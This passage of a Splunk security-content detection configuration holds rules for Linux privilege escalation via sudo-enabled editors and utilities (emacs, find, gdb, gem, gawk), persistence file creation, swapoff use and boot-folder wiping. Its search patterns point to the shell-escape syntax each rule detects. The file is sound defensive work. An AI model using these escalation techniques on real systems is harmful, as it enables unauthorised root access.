`linux_edit_cron_table_parameter_filter` [ESCU - Linux Emacs Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = EMACS is a family of text editors that are characterized by their extensibility. The manual for the most widely used variant, GNU Emacs, describes it as "the extensible, customizable, self-documenting, real-time display editor". If sudo right is given to EMACS tool for the user, then the user can run special commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = EMACS is a family of text editors that are characterized by their extensibility. The manual for the most widely used variant, GNU Emacs, describes it as "the extensible, customizable, self-documenting, real-time display editor". If sudo right is given to EMACS tool for the user, then the user can run special commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Emacs Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Emacs Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*emacs*" AND Processes.process="*--eval*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_emacs_privilege_escalation_filter` [ESCU - Linux File Created In Kernel Driver Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious file creation in kernel/driver directory in linux platform. This directory is known folder for all linux kernel module available within the system. so creation of file in this directory is a good indicator that there is a possible rootkit installation in the host machine. This technique was abuse by adversaries, malware author and red teamers to gain high privileges to their malicious code such us in kernel level. Even this event is not so common administrator or legitimate 3rd party tool may install driver or linux kernel module as part of its installation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious file creation in kernel/driver directory in linux platform. This directory is known folder for all linux kernel module available within the system. so creation of file in this directory is a good indicator that there is a possible rootkit installation in the host machine. This technique was abuse by adversaries, malware author and red teamers to gain high privileges to their malicious code such us in kernel level. Even this event is not so common administrator or legitimate 3rd party tool may install driver or linux kernel module as part of its installation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can create file in this folders for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-22 action.escu.modification_date = 2021-12-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux File Created In Kernel Driver Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux File Created In Kernel Driver Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/kernel/drivers/*") by Filesystem.dest Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_file_created_in_kernel_driver_directory_filter` [ESCU - Linux File Creation In Init Boot Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious file creation on init system directories for automatic execution of script or file upon boot up. This technique is commonly abuse by adversaries, malware author and red teamer to persist on the targeted or compromised host. This behavior can be executed or use by an administrator or network operator to add script files or binary files as part of a task or automation. filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1037.004", "T1037"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious file creation on init system directories for automatic execution of script or file upon boot up. This technique is commonly abuse by adversaries, malware author and red teamer to persist on the targeted or compromised host. This behavior can be executed or use by an administrator or network operator to add script files or binary files as part of a task or automation. filter is needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase action.escu.known_false_positives = Administrator or network operator can create file in this folders for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux File Creation In Init Boot Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux File Creation In Init Boot Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1037.004", "T1037"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/init.d/*", "*/etc/rc.d/*", "*/sbin/init.d/*", "*/etc/rc.local*") by Filesystem.dest Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_file_creation_in_init_boot_directory_filter` [ESCU - Linux File Creation In Profile Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious file creation in /etc/profile.d directory to automatically execute scripts by shell upon boot up of a linux machine. This technique is commonly abused by adversaries, malware and red teamers as a persistence mechanism to the targeted or compromised host. This Anomaly detection is a good indicator that someone wants to run a code after boot up which can be done also by the administrator or network operator for automation purposes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.004", "T1546"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious file creation in /etc/profile.d directory to automatically execute scripts by shell upon boot up of a linux machine. This technique is commonly abused by adversaries, malware and red teamers as a persistence mechanism to the targeted or compromised host. This Anomaly detection is a good indicator that someone wants to run a code after boot up which can be done also by the administrator or network operator for automation purposes. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can create file in profile.d folders for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux File Creation In Profile Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux File Creation In Profile Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.004", "T1546"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/profile.d/*") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_file_creation_in_profile_directory_filter` [ESCU - Linux Find Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Find is a command-line utility that locates files based on some user-specified criteria and either prints the pathname of each matched object or, if another action is requested, performs that action on each matched object. If sudo right is given to find utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Find is a command-line utility that locates files based on some user-specified criteria and either prints the pathname of each matched object or, if another action is requested, performs that action on each matched object. If sudo right is given to find utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Find Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Find Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*find*" AND Processes.process="*-exec*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_find_privilege_escalation_filter` [ESCU - Linux GDB Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = GDB is the acronym for GNU Debugger. This tool helps to debug the programs written in C, C++, Ada, Fortran, etc. The console can be opened using the gdb command on terminal. If sudo right is given to GDB tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = GDB is the acronym for GNU Debugger. This tool helps to debug the programs written in C, C++, Ada, Fortran, etc. The console can be opened using the gdb command on terminal. If sudo right is given to GDB tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux GDB Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux GDB Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*gdb*" AND Processes.process="*-nx*" AND Processes.process="*-ex*!*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_gdb_privilege_escalation_filter` [ESCU - Linux Gem Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries (in a self-contained format called a "gem"), a tool designed to easily manage the installation of gems, and a server for distributing them. If sudo right is given to GEM utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries (in a self-contained format called a "gem"), a tool designed to easily manage the installation of gems, and a server for distributing them. If sudo right is given to GEM utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Gem Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Gem Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*gem*open*-e*" AND Processes.process="*-c*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_gem_privilege_escalation_filter` [ESCU - Linux GNU Awk Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = gawk command in Linux is used for pattern scanning and processing language. The awk command requires no compiling and allows the user to use variables, numeric functions, string functions, and logical operators. It is a utility that enables programmers to write tiny and effective programs in the form of statements that define text patterns that are to be searched for, in a text document and the action that is to be taken when a match is found within a line. If sudo right is given to gawk tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = gawk command in Linux is used for pattern scanning and processing language. The awk command requires no compiling and allows the user to use variables, numeric functions, string functions, and logical operators. It is a utility that enables programmers to write tiny and effective programs in the form of statements that define text patterns that are to be searched for, in a text document and the action that is to be taken when a match is found within a line. If sudo right is given to gawk tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux GNU Awk Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux GNU Awk Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*gawk*" AND Processes.process="*BEGIN*{system*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_gnu_awk_privilege_escalation_filter` [ESCU - Linux Hardware Addition SwapOff - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for process execution to disable the swapping of paging devices. This technique was seen in Awfulshred malware that disables the swapping of the specified devices and files. This anomaly detection can be a good indicator that a process or a user tries to disable this Linux feature in a targeted host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1200"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for process execution to disable the swapping of paging devices. This technique was seen in Awfulshred malware that disables the swapping of the specified devices and files. This anomaly detection can be a good indicator that a process or a user tries to disable this Linux feature in a targeted host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = administrator may disable swapping of devices in a linux host. Filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Hardware Addition SwapOff - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ swap off paging device in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Hardware Addition SwapOff - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1200"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "swapoff" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_hardware_addition_swapoff_filter` [ESCU - Linux High Frequency Of File Deletion In Boot Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a high frequency of file deletion relative to process name and process id /boot/ folder. These events was seen in industroyer2 wiper malware where it tries to delete all files in a critical directory in linux directory. This detection already contains some filter that might cause false positive during our testing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a high frequency of file deletion relative to process name and process id /boot/ folder. These events was seen in industroyer2 wiper malware where it tries to delete all files in a critical directory in linux directory. This detection already contains some filter that might cause false positive during our testing. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = linux package installer/uninstaller may cause this event. Please update you filter macro to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux High Frequency Of File Deletion In Boot Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = Multiple files detection in /boot/ folder on $dest$ by process GUID - $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux High Frequency Of File Deletion In Boot Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = auto 